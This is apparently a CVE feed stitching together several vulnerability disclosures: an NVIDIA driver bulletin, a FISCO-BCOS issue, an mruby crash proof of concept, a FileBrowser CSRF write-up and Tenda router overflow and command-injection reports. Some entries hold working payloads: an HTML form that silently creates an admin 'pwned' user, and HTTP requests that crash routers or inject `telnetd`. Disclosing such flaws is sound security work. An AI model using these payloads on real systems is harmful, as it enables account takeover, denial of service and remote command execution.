NVIDIA vGPU software contains a vulnerability in the Virtual GPU Manager (nvidia.ko), where a user in the guest OS can cause a GPU interrupt storm on the hypervisor host, leading to a denial of service.

**Details**

This section provides a summary of potential vulnerabilities  that this security update addresses and their impact. Descriptions use CWE™, and base scores and vectors use CVSS v3.1 standards.

**NVIDIA GPU Display Driver**

**CVE ID**

**Description**

**Base Score**

**Vector**

CVE‑2022‑21813

NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel driver, where improper handling of insufficient permissions or privileges may allow an unprivileged local user limited write access to protected memory, which can lead to denial of service.

6.1

AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H

CVE‑2022‑21814

NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel driver package, where improper handling of insufficient permissions or privileges may allow an unprivileged local user limited write access to protected memory, which can lead to denial of service.

6.1

AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H

CVE‑2022‑21815  

NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer (nvlddmkm.sys) handler for private IOCTLs where a NULL pointer dereference in the kernel, created within user mode code, may lead to a denial of service in the form of a system crash.

5.5

AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

**NVIDIA vGPU Software**

**CVE ID**

**Description**

**Base Score**

**Vector**

CVE‑2022‑21816

NVIDIA vGPU software contains a vulnerability in the Virtual GPU Manager (nvidia.ko), where a user in the guest OS can cause a GPU interrupt storm on the hypervisor host, leading to a denial of service.

5.5

AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

The NVIDIA risk assessment is based on an average of risk across a diverse set of installed systems and may not represent the true risk to your local installation. NVIDIA recommends evaluating the risk to your specific configuration.

**Security Updates for NVIDIA GPU Display Driver**

The following table lists the NVIDIA software products affected, versions affected, and the updated version available from nvidia.com that includes this security update. Download the updates from the NVIDIA Driver Downloads page.

**Windows **

**CVE IDs Addressed**

**Software Product**

**Operating System**

**Driver Branch**

**Affected Driver Versions**

**Updated Driver Version**

CVE‑2022‑21815

GeForce

Windows

R510

All versions prior to 511.65

511.65

Windows 10 and 11

R470

All drivers versions prior to 472.98 for support of GeForce Kepler desktop

472.98

Windows 7 and 8._x_

R470

All drivers versions prior to 473.04

473.04

Studio

Windows

R510

All driver versions prior to 511.65

511.65

NVIDIA RTX/Quadro, NVS

Windows

R510

All driver versions prior to 511.65 

511.65

R470

All drivers versions prior to 472.98

472.98

Tesla

Windows

R510

All drivers versions prior to 511.65

511.65 

R470

All drivers versions prior to 472.98

472.98

R450

All drivers versions prior to 453.37

453.37

**Linux**

**CVE IDs Addressed**

**Software Product**

**Operating System**

**Driver Branch**

**Affected Driver Versions**

**Updated Driver Version**

CVE‑2022‑21813  
CVE‑2022‑21814

GeForce

Linux

R510

All drivers versions prior to 510.47.03  

510.47.03

R470

All drivers versions prior to 470.103.01

470.103.01

NVIDIA RTX/ Quadro, NVS

Linux

R510

All drivers versions prior to 510.47.03

510.47.03

R470

All drivers versions prior to 470.103.01

470.103.01

Tesla

Linux

R510

All drivers versions prior to 510.47.03 

510.47.03

R470

All drivers versions prior to 470.103.01

470.103.01

**Notes:**

*   Your computer hardware vendor may provide you with Windows GPU display driver versions including 511.66, 497.30, 472.91, and 453.35 which also contain the security updates.
*   The table above may not be a comprehensive list of all affected supported versions or branch releases and may be updated as more information becomes available.
*   Earlier software branch releases that support these products may also be affected. If you are using an earlier branch release for which an update version is not listed above, we recommend upgrading to the latest branch release.

**Security Updates for NVIDIA vGPU Software**

The following table lists the NVIDIA software products affected, versions affected, and the updated version. Log in to the NVIDIA Enterprise Application Hub to download updates from the NVIDIA Licensing Portal.

**CVE IDs Addressed**

**vGPU Software Component**

**Operating System**

**Affected Versions**

**Updated Version**

**vGPU Software**

**Driver**

**vGPU Software**

**Driver**

CVE‑2022‑21815

vGPU software (guest driver)

Windows

All versions prior to and including 13.1

472.39

13.2

472.98

All versions prior to and including 11.6

453.23

11.7

453.37

All versions prior to and including 8.9

427.60

8.10

427.71

CVE‑2022‑21813

vGPU software (guest driver)

Linux

All versions prior to and including 13.1

470.82.00

13.2

470.103.01

All versions prior to and including 11.6

450.156.00

11.7

450.172.01

All versions prior to and including 8.9

418.226.00

8.10

418.240

CVE‑2022‑21816

vGPU software (Virtual GPU Manager)

Citrix Hypervisor,  
VMware vSphere,  
Red Hat Enterprise Linux with KVM,  
Ubuntu,  
Nutanix AHV

All versions prior to and including 13.1

470.82

13.2

470.103.02

All versions prior to and including 11.6

450.156

11.7

450.172

All versions prior to and including 8.9

418.226.00

8.10

418.240

**Notes:**

*   The table above may not be a comprehensive list of all affected supported versions or branch releases and may be updated as more information becomes available.
*   Earlier software branch releases that support these products may also be affected. If you are using an earlier branch release for which an update version is not listed above, we recommend upgrading to the latest branch release.

**Security Updates for NVIDIA Cloud Gaming**

The following table lists the NVIDIA software products affected, versions affected, and the updated version. Log in to the NVIDIA Enterprise Application Hub to download updates from the NVIDIA Licensing Portal.

**CVE IDs Addressed**

**Software Product**

**Operating System**

**Affected Versions**

**Updated Version**

**Cloud Gaming Software**

**Driver**

**Cloud Gaming Software**

**Driver**

CVE‑2022‑21815

Cloud Gaming Guest Driver 

Windows

All versions prior to and including the November 2021 Cloud Gaming Release

497.09

January 2022 Cloud Gaming Release

511.65

CVE‑2022‑21813

Cloud Gaming Guest Driver

Linux

All versions prior to and including the November 2021 Cloud Gaming Release

495.50

January 2022 Cloud Gaming Release

510.47.03

CVE‑2022‑21816

Cloud Gaming Virtual GPU Manager

Citrix Hypervisor,  
Red Hat Enterprise Linux with KVM

All versions prior to and including the November 2021 Cloud Gaming Release

495.50

January 2022 Cloud Gaming Release

510.47.03

**Notes**:

*   The table above may not be a comprehensive list of all affected supported versions or branch releases and may be updated as more information becomes available.
*   Earlier software branch releases that support these products may also be affected. If you are using an earlier branch release for which an update version is not listed above, we recommend upgrading to the latest branch release.

**Mitigations**

None. See Security Updates for NVIDIA GPU Display Driver, Security Updates for NVIDIA vGPU Software, or Security Updates for NVIDIA Cloud Gaming for the version to install.

**Get the Most Up to Date Product Security Information**

Visit the NVIDIA Product Security page to

*   Subscribe to security bulletin notifications
*   See the current list of NVIDIA security bulletins 
*   Report a potential security issue in any NVIDIA supported product
*   Learn more about the vulnerability management process followed by the NVIDIA Product Security Incident Response Team (PSIRT) 

**Revision History**

  

**Revision**

**Date**

**Description**

1.0

February 1, 2022

Initial release

**Support**

If you have any questions about this security bulletin, contact NVIDIA Support.

**Frequently Asked Questions (FAQs)**

How do I determine which NVIDIA display driver version is currently installed on my PC?

**Disclaimer**

ALL NVIDIA INFORMATION, DESIGN SPECIFICATIONS, REFERENCE BOARDS, FILES, DRAWINGS, DIAGNOSTICS, LISTS, AND OTHER DOCUMENTS (TOGETHER AND SEPARATELY, “MATERIALS”) ARE BEING PROVIDED “AS IS.” NVIDIA MAKES NO WARRANTIES, EXPRESS, IMPLIED, STATUTORY, OR OTHERWISE WITH RESPECT TO THE MATERIALS, AND ALL EXPRESS OR IMPLIED CONDITIONS, REPRESENTATIONS AND WARRANTIES, INCLUDING ANY IMPLIED WARRANTY OR CONDITION OF TITLE, MERCHANTABILITY, SATISFACTORY QUALITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT, ARE HEREBY EXCLUDED TO THE MAXIMUM EXTENT PERMITTED BY LAW.

Information is believed to be accurate and reliable at the time it is furnished. However, NVIDIA Corporation assumes no responsibility for the consequences of use of such information or for any infringement of patents or other rights of third parties that may result from its use. No license is granted by implication or otherwise under any patent or patent rights of NVIDIA Corporation. Specifications mentioned in this publication are subject to change without notice. This publication supersedes and replaces all information previously supplied. NVIDIA Corporation products are not authorized for use as critical components in life support devices or systems without express written approval of NVIDIA Corporation.

CVE-2022-21816: Security Bulletin: NVIDIA GPU Display Driver - February 2022

FISCO-BCOS release-3.0.0-rc2 contains a denial of service vulnerability. Some transactions may not be committed successfully, and malicious users may use this to achieve double-spending attacks.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

**Transactions fail to be committed #2124**

Open

fCorleone opened this issue

Jan 12, 2022

· 1 comment

Assignees

![@cyjseagull](https://avatars.githubusercontent.com/u/4343461?s=40&v=4)

**Comments**

![@fCorleone](https://avatars.githubusercontent.com/u/22519865?s=88&u=051868d1e1a8a939ede5a1c6818dd528ce636a3c&v=4)

**Describe the bug**  
I use the testing programs to send 500000 transactions to a group with 4 nodes, it seems that over 100 of the transactions cannot be committed successfully.  
![wecom-temp-675e4c5843084c7034a92e2e2b2a83be](https://user-images.githubusercontent.com/22519865/149072866-b8423c2e-ae7c-47ed-9732-4e810a38e9ee.png)

**To Reproduce**  
Steps to reproduce the behavior:

1.  Setup a group with 4 nodes, each with a small size of tx pool.
2.  Constantly sending txs to the group
3.  The tx pool of some nodes are full and txs forwarded from other nodes are rejected
4.  If the tx pool of the leader node is empty and the txpool of less than f nodes are empty, the txs of non-leader node will not be handled, the bug will be triggered.

**Expected behavior**  
All transactions should be commited successfully.

**Environment (please complete the following information):**

*   OS: Ubuntu 20.04
*   FISCO BCOS release-3.0.0-rc2

![@fCorleone](https://avatars.githubusercontent.com/u/22519865?s=60&u=051868d1e1a8a939ede5a1c6818dd528ce636a3c&v=4) fCorleone changed the title Transactions fail to be committed and the consensus process is stuck Transactions fail to be committed

Jan 12, 2022

![@cyjseagull](https://avatars.githubusercontent.com/u/4343461?s=88&v=4)

**Bug analysis**

1.  After the txppool is full, the current logic will reject the txs forwarded by other nodes from P2P, resulting in some txs only exist in less than f nodes
2.  As the stress test progresses, txs in the txpool with more than (2\*f+1) nodes will be processed, causes the txpool of more than (2f+1) nodes are empty and less than (f) nodes are non-empty.
3.  If the subsequent consensus leader does not belong to the non-empty node combination, it will not seal and generate new block, resulting in some transactions not being processed.

**Solution**

Please refer to PR #2123

*   Even if the node txpool is full, accept txs forwarded from P2P by other nodes, ensure that txs received by some consensus node are broadcast to all other consensus nodes that may act as leaders

2 participants

 ![@cyjseagull](https://avatars.githubusercontent.com/u/4343461?s=52&v=4)![@fCorleone](https://avatars.githubusercontent.com/u/22519865?s=52&v=4)

CVE-2021-46359: Transactions fail to be committed · Issue #2124 · FISCO-BCOS/FISCO-BCOS

NULL Pointer Dereference in Homebrew mruby prior to 3.2.

**Description**

There is a NULL Pointer Dereference in iv\_free (`src/variable.c:232:20`). This bug has been found on mruby lastest commit (hash `00f2b74ab2c1f03084908c815dcd0934f9fc702a`) on Ubuntu 20.04 for x86\_64/amd64.

**Proof of Concept**

    3.times{e=0,"#{* =c={}
    [y:0,**0]
    0}"}
    

**Steps to reproduce**

1- Clone repo and build with ASAN using MRUBY\_CONFIG=build\_config/clang-asan.rb rake 2- Use mruby to execute the poc:

    $ echo -ne "My50aW1lc3tlPTAsIiN7KiA9Yz17fQpbeTowLCoqMF0KMH0ifQ==" | base64 -d > poc
    $ mruby poc
    /home/faraday/mruby/src/variable.c:232:20: runtime error: member access within misaligned address 0x000000000001 for type 'iv_tbl' (aka 'struct iv_tbl'), which requires 8 byte alignment
    0x000000000001: note: pointer points here
    <memory cannot be printed>
    SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior /home/faraday/mruby/src/variable.c:232:20 in 
    /home/faraday/mruby/src/variable.c:232:20: runtime error: load of misaligned address 0x000000000009 for type 'mrb_value *' (aka 'struct mrb_value *'), which requires 8 byte alignment
    0x000000000009: note: pointer points here
    <memory cannot be printed>
    SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior /home/faraday/mruby/src/variable.c:232:20 in 
    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==77626==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000009 (pc 0x0000007e9575 bp 0x62f000017fb8 sp 0x7fff1e800280 T0)
    ==77626==The signal is caused by a READ memory access.
    ==77626==Hint: address points to the zero page.
        #0 0x7e9574 in iv_free /home/faraday/mruby/src/variable.c:232:20
        #1 0x7e9574 in mrb_gc_free_iv /home/faraday/mruby/src/variable.c:278:5
        #2 0x5efb1a in obj_free /home/faraday/mruby/src/gc.c:856:5
        #3 0x5e26a5 in free_heap /home/faraday/mruby/src/gc.c:433:9
        #4 0x5e26a5 in mrb_gc_destroy /home/faraday/mruby/src/gc.c:442:3
        #5 0x63e1de in mrb_close /home/faraday/mruby/src/state.c:195:3
        #6 0x4cb74a in main /home/faraday/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c
        #7 0x7fbe060530b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
        #8 0x41f89d in _start (/home/faraday/mruby/build/host/bin/mruby+0x41f89d)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/faraday/mruby/src/variable.c:232:20 in iv_free
    ==77626==ABORTING
    

Running the same script with a release build (without asan) results in a segfault due to the invalid dereference.

**Impact**

This vulnerability is capable of making the mruby interpreter crash, thus affecting the availability of the system.

**Acknowledgements**

This bug was found by Octavio Gianatiempo (ogianatiempo@faradaysec.com) and Octavio Galland (ogalland@faradaysec.com) from Faraday Research Team.

CVE-2022-0481: NULL Pointer Dereference in mruby

The config restore function of Voipmonitor GUI before v24.96 does not properly check files sent as restore archives, allowing remote attackers to execute arbitrary commands via a crafted file in the web root.

CVE-2022-24262: News - VoIPmonitor

A Cross-Site Request Forgery (CSRF) vulnerability exists in Filebrowser < 2.18.0 that allows attackers to create a backdoor user with admin privilege and get access to the filesystem via a malicious HTML webpage that is sent to the victim.

 

**Introduction**

 This is _Febin_ , a security professional.

I used to pick random opensource software for my research, recently I took some web based file management software as my research targets. There I found some popular web-based file managers, one of them was a software named "FileBrowser" . While poking around I was able to find an awesome vulnerability in the application that leads to account takeover, complete access to filesystem and command execution. This article is going to be on that vulnerability.

![](https://raw.githubusercontent.com/filebrowser/logo/master/banner.png)

 

![](https://user-images.githubusercontent.com/5447088/50716739-ebd26700-107a-11e9-9817-14230c53efd2.gif)

**Disclosure Timeline:**

October 16, 2021 - Contacted the vendor and reported the vulnerability

October 19, 2021 - Vendor replies back

October 30, 2021 - Vulnerability has been patched in version **v2.18.0**  

**Vendor/Software - Product Details**

Filebrowser provides a file managing interface within a specified directory and it can be used to upload, delete, preview, rename and edit your files. It allows the creation of multiple users and each user can have its own directory. It can be used as a standalone app or as a middleware.

Link**:** https://filebrowser.org/

Github Repo**:** https://github.com/filebrowser/filebrowser

**The Vulnerability:**

FileBrowser is a popular file manager / file managing interface developed in Go language. Admin can create multiple users, even another Admin privileged user and give access to any directory he wants, the user creation is handled by an endpoint "/api/users".

The endpoint accepts input in JSON format to create users, but fails to verify that the "Content-Type" HTTP header, the Content-Type header's value should be "application/json" but it accepts "text/plain" and that's where the vulnerability arise. Also the "Origin" is not validated and there's no anti-CSRF tokens implemented either.  

Hence an attacker can easily exploit this vulnerability to create a backdoor user with admin privileges and access to the home directory or whichever directory the attacker wants to access, just by sending a malicious webpage URL to the legitimate admin and access the whole filesystem of the victim.

![fbrowser_csrf_request.png](https://mail.google.com/mail/u/0?ui=2&ik=fec866bf73&attid=0.7&permmsgid=msg-a:r8138901937133118232&th=17c89bba72cd208b&view=fimg&fur=ip&sz=s0-l75-ft&attbid=ANGjdJ-faHR8nxp0GtgpxNw-6unFMLa_bzBdFCzCIox0L5hxZjGBZfMZW_TLmUI29X7DsBf4Bxm7yQ-ZAwlElVufMk3_om2hJ-i8FlhZskgnU7s3znCsix7xzba9X0E&disp=emb&realattid=ii_kutyguqo6)

**Affected Versions: _v2.17.2 and below versions were affected. =< 2.17.2  
_**

**Proof Of Concept:** 

**The below HTML code will exploit the Flaw**

<html>

  <body style="text-align:center;">  
  <h1> FileBrowser CSRF PoC by Febin </h1>  
    <form action="http://ubuntu.local:8080/api/users" method="POST" enctype="text/plain">

      <input type="hidden" name='{"what":"user","which":\[\],"data":{"scope":"../../../../root/","locale":"en","viewMode":"mosaic","singleClick":false,"sorting":{"by":"","asc":false},"perm":{"admin":true,"execute":true,"create":true,"rename":true,"modify":true,"delete":true,"share":true,"download":true},"commands":\[\],"hideDotfiles":false,"username":"pwned","password":"","rules":\[{"allow":true,"path":"../","regex":false,"regexp":{"raw":""}}\],"lockPassword":false,"id":0,"password":"pwned"}}' value='test'>  
      <input type="submit" value="CLICK ME!">  
    </form>

      </body>

</html>

**1\. I started a filebrowser instance inside my ubuntu VM**

![fb_csrf.png](https://mail.google.com/mail/u/0?ui=2&ik=fec866bf73&attid=0.1&permmsgid=msg-a:r8138901937133118232&th=17c89bba72cd208b&view=fimg&fur=ip&sz=s0-l75-ft&attbid=ANGjdJ9s9MIrSZXciTBGHuHwAsNF8jeb3D_pDeMKb9qcEieFBt0cg9nCikDq8dz2ttOzkLqDkTzq9yrsB6d1DSBZjkI36QNq4U2uHP2ztskdVkcrFiAZht_MIc3tcTw&disp=emb&realattid=ii_kuty59zg0)

**2\. I hosted the exploit on a simple HTTP server inside my host OS.**

![fbrowser_csrf1.png](https://mail.google.com/mail/u/0?ui=2&ik=fec866bf73&attid=0.2&permmsgid=msg-a:r8138901937133118232&th=17c89bba72cd208b&view=fimg&fur=ip&sz=s0-l75-ft&attbid=ANGjdJ-NN4bg5wZBVDjv5LBKc5sVUSJEBRURZlFlWpEQiz3oggae2U0CSjXGdq0zZbDEHFCY2MJyARsh_f_MhCZdNP-qehN3knJMz7G2S2wOPJAGDi4wr4TWn5nrxEE&disp=emb&realattid=ii_kuty73va1)

![fbrowser_csrf2.png](https://mail.google.com/mail/u/0?ui=2&ik=fec866bf73&attid=0.3&permmsgid=msg-a:r8138901937133118232&th=17c89bba72cd208b&view=fimg&fur=ip&sz=s0-l75-ft&attbid=ANGjdJ9vMYyKtIZzy-qxY8k5OAGKo9eSSdCqnVl5OtvAIHm4swRWg-V_L6_8xOBbR31ptLCXRlnhl9P7NvTSYv7kaTq1RiVcMu_HhhXn5lOC8bnZQj8W-sYzCH-Q37k&disp=emb&realattid=ii_kuty7jig2)

**3\. When I click the "CLICK ME!" button, it sends a POST request in the background towards the filebrowser URL  and that creates a backdoor user named "pwned" with access to the "/root/" directory.**

![fbrowser_csrf3.png](https://mail.google.com/mail/u/0?ui=2&ik=fec866bf73&attid=0.4&permmsgid=msg-a:r8138901937133118232&th=17c89bba72cd208b&view=fimg&fur=ip&sz=s0-l75-ft&attbid=ANGjdJ_seMaxG2VNWxbqgSuCTjvA1pB5U9OzmQ8hR3vzNx4IIGJnLeKE0PueLiX33xbuRcuPmz6iZcPkNKqJnrMtfiPWxyHo8LySXuBd-pmh1eTJCliqR2FfxVGhVIY&disp=emb&realattid=ii_kutyax4x3)

![fbrowser_csrf4.png](https://mail.google.com/mail/u/0?ui=2&ik=fec866bf73&attid=0.5&permmsgid=msg-a:r8138901937133118232&th=17c89bba72cd208b&view=fimg&fur=ip&sz=s0-l75-ft&attbid=ANGjdJ8C8VYJdsXb2PTx6ggRgNZyfnul_XTucQ3YGfSLvB_YCjMctW7mIM-kA7INGJG_xtiGETmQ1Iavbqg80OdxJk7EklXRt3aIXjYrUKd67prWR53y6QwK_bcNIqs&disp=emb&realattid=ii_kutyb7y94)

Logged in as pwned user.  

![fbrowser_csrf_root.png](https://mail.google.com/mail/u/0?ui=2&ik=fec866bf73&attid=0.6&permmsgid=msg-a:r8138901937133118232&th=17c89bba72cd208b&view=fimg&fur=ip&sz=s0-l75-ft&attbid=ANGjdJ8yCX5Zcugx_fpfaKc2-J9GuDSFQ9jZShpNABnOFCb0_Texrg_krQM0ZEm21tzBVHpwXu7XILsgkSCQ8_Fn8hZ58jW8yFJ9l1tNDh8Q6A4YmVOd4zNFgqus3sk&disp=emb&realattid=ii_kutybnk55)

Root Cause:

1\. X-Auth header is not validated properly

2\. No Anti-CSRF token

3\. Using content-type "text/plain" makes the attack possible

4\. Origin header is not validated  

![fbrowser_csrf_request.png](https://mail.google.com/mail/u/0?ui=2&ik=fec866bf73&attid=0.7&permmsgid=msg-a:r8138901937133118232&th=17c89bba72cd208b&view=fimg&fur=ip&sz=s0-l75-ft&attbid=ANGjdJ-faHR8nxp0GtgpxNw-6unFMLa_bzBdFCzCIox0L5hxZjGBZfMZW_TLmUI29X7DsBf4Bxm7yQ-ZAwlElVufMk3_om2hJ-i8FlhZskgnU7s3znCsix7xzba9X0E&disp=emb&realattid=ii_kutyguqo6) 

**PATCH**

Update to the latest version as the flaw has been patched from v2.18.0

Commit: https://github.com/filebrowser/filebrowser/commit/74b7cd8e81840537a8206317344f118093153e8d

**Thank you.**

CVE-2021-46398: Critical CSRF in FileBrowser

Tenda routers G1 and G3 v15.11.0.17(9502)_CN were discovered to contain a stack overflow in the function formAddDhcpBindRule. This vulnerability allows attackers to cause a Denial of Service (DoS) via the addDhcpRules parameter.

**Tenda Vulnerability**

Vendor:Tenda

Product:G1、G3

Version:V15.11.0.17(9502)\_CN(Download Link:https://www.tenda.com.cn/download/detail-3108.html)

Type:Stack Overflow

Author:Jiaqian Peng

Institution:pengjiaqian@iie.ac.cn

**Vulnerability description**

We found an stack overflow vulnerability in Tenda router with firmware which was released recently, allows remote attackers to crash the server.

**Stack Overflow**

In `httpd` binary:

In `formAddDhcpBindRule` function, `addDhcpRules` is directly passed by the attacker, If this part of the data is too long, it will cause the stack overflow, so we can control the `addDhcpRules` to execute arbitrary code.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_43/images/1.png)

As you can see here, the input has not been checked. In `addDhcpRule` function, the parameter `addDhcpRules` is directly copy to a local variable placed on the stack, which overrides the return address of the function, causing buffer overflow.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_43/images/2.png)

**Supplement**

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.

**PoC**

We set `addDhcpRules` as **0%09aaaaaaa......%0900%3A0C%3A29%3A7C%3A0B%3A2F** , and the router will crash, such as:

POST /goform/addDhcpBindRules HTTP/1.1
Host: 192.168.1.252
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/plain, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 287
Origin: http://192.168.1.252
Connection: close
Referer:q http://192.168.1.252/network/lanSet.html?0.5957113036342736
Cookie: \_:USERNAME:\_=; G3v3\_user=

addDhcpRules=0%09aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa%0900%3A0C%3A29%3A7C%3A0B%3A2F

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_43/images/3.png)

**Result**

The target router crashes and cannot provide services correctly and persistently.

CVE-2022-24172: my_vuln/43.md at main · pjqwudi/my_vuln

Tenda routers G1 and G3 v15.11.0.17(9502)_CN were discovered to contain a command injection vulnerability in the function formSetIpSecTunnel. This vulnerability allows attackers to execute arbitrary commands via the IPsecLocalNet and IPsecRemoteNet parameters.

**Tenda Vulnerability**

Vendor:Tenda

Product:G1、G3

Version:V15.11.0.17(9502)\_CN(Download Link:https://www.tenda.com.cn/download/detail-3108.html)

Type:Remote Command Execution

Author:Jiaqian Peng

Institution:pengjiaqian@iie.ac.cn

**Vulnerability description**

We found an Command Injection vulnerability in Tenda router with firmware which was released recently, allows remote attackers to execute arbitrary OS commands from a crafted request.

**Remote Command Execution**

In `httpd` binary:

In `formSetIpSecTunnel` function, `IPsecLocalNet、IPsecRemoteNet` is directly passed by the attacker, so we can control the `IPsecLocalNet、IPsecRemoteNet` to attack the OS.

First, make corresponding settings according to the selected network mode. This vulnerability occurs in the `setIpSecTunnelSettings` function. We mainly explain the data flow of this part.

Here, enter the function `getIpSecTunnelSettings` for the next data flow tracking.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_36/images/1.png)

The part that gets the user input is in the function `getIpSecTunnelSettings`.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_36/images/2.png)

As you can see here, in `setIpSecTunnelSettings` function, the input has not been checked. And then, call the function `prod_cfm_set_val` to store this input.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_36/images/3.png)

This step is mainly for inter-process communication, the vulnerability will be triggered in another binary file.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_36/images/4.png)

**The necessary condition for successfully triggering the vulnerability is to enable the l2tp service, so we need to send two packets to complete the triggering of the vulnerability**

In `netctrl` binary:

In `vpn_ipsec_init_param` function, the initial input will be extracted.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_36/images/5.png)

Eventually, in `vpn_ipsec_enable` function, the initial input will cause command injection.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_36/images/6.png)

> There are many trigger points in the program execution process, only one place is shown here.

**Supplement**

The trigger point of this vulnerability is deep in the program path, so we recommend that the string content should be strictly checked when extracting user input.

Vulnerability trigger steps:

*   Enable l2tp service
*   Set ipsectunel

**PoC**

Enable l2tp service.

POST /goform/setVpnServer HTTP/1.1
Host: 192.168.1.252
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/plain, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 79
Origin: http://192.168.1.252
Connection: close
Referer: http://192.168.1.252/vpn/pptpServer.html?0.9176754136302114
Cookie: \_:USERNAME:\_=; G3v3\_user=

vpnServerEn=true&vpnServerType=l2tp&vpnServerWAN=WAN1&l2tpServerEncrypt=disable

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_36/images/7.png)

We set `IPsecRemoteNet` as **`telnetd`** , and the router will excute it,such as:

POST /goform/setIPsecTunnel HTTP/1.1
Host: 192.168.1.252
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/plain, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 590
Origin: http://192.168.1.252
Connection: close
Referer: http://192.168.1.252/vpn/ipsec.html?0.40102392250425467
Cookie: \_:USERNAME:\_=; G3v3\_user=

IPsecTunnelIndex=0&IPsecEn=true&IPsecWrapMode=tunnel&IPsecWAN=WAN1&IPsecConnectName=pjqwudi&IPsecDealMode=1&IPsecTunnelProtocol=ESP&IPsecGateway=www.baidu.com&IPsecLocalNet=192.168.1.0%2F24&IPsecRemoteNet=\`telnetd\`&IPsecNegotiation=auto&IPsecSecurity=psk&IPsecSharePwd=123123123&IPsecDPDEn=true&IPsecDPDTime=1&IPsecMode=main&IPsecEncrypt1=3DES&IPsecVerify1=SHA1&IPsecDH1=768&IPsecRemoteIdentifierEn=false&IPsecRemoteIdentifier=&IPsecLocalIdentifierEn=false&IPsecLocalIdentifier=&IPsecPwdValidity1=3600&IPsecPFSEn=true&IPsecEncrypt2=3DES&IPsecVerify2=SHA1&IPsecDH2=768&IPsecPwdValidity2=3600

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_36/images/8.png)

**Result**

The target router has enabled the telnet service.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_36/images/9.png)

CVE-2022-24170: my_vuln/36.md at main · pjqwudi/my_vuln

Tenda routers G1 and G3 v15.11.0.17(9502)_CN were discovered to contain a command injection vulnerability in the function formSetDMZ. This vulnerability allows attackers to execute arbitrary commands via the dmzHost1 parameter.

**Tenda Vulnerability**

Vendor:Tenda

Product:G1、G3

Version:V15.11.0.17(9502)\_CN(Download Link:https://www.tenda.com.cn/download/detail-3108.html)

Type:Remote Command Execution

Author:Jiaqian Peng

Institution:pengjiaqian@iie.ac.cn

**Vulnerability description**

We found an Command Injection vulnerability in Tenda router with firmware which was released recently, allows remote attackers to execute arbitrary OS commands from a crafted request.

**Remote Command Execution**

In `httpd` binary:

In `formSetDMZ` function, `dmzHost1` is directly passed by the attacker, so we can control the `dmzHost1` to attack the OS.

As you can see here, the input has not been checked. And then, call the function `prod_cfm_set_val` to store this input.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_39/images/1.png)

In `netctrl` binary:

In `advance_get_dmz_cfg` function, the initial input will be extracted.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_39/images/2.png)

Eventually, in `advance_set_dmz_cfg` function, the initial input will cause command injection.

![](https://github.com/pjqwudi/my_vuln/raw/main/Tenda/vuln_39/images/3.png)

**Supplement**

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.

**PoC**

We set `dmzHost1` as **`telnetd`** , and the router will excute it,such as:

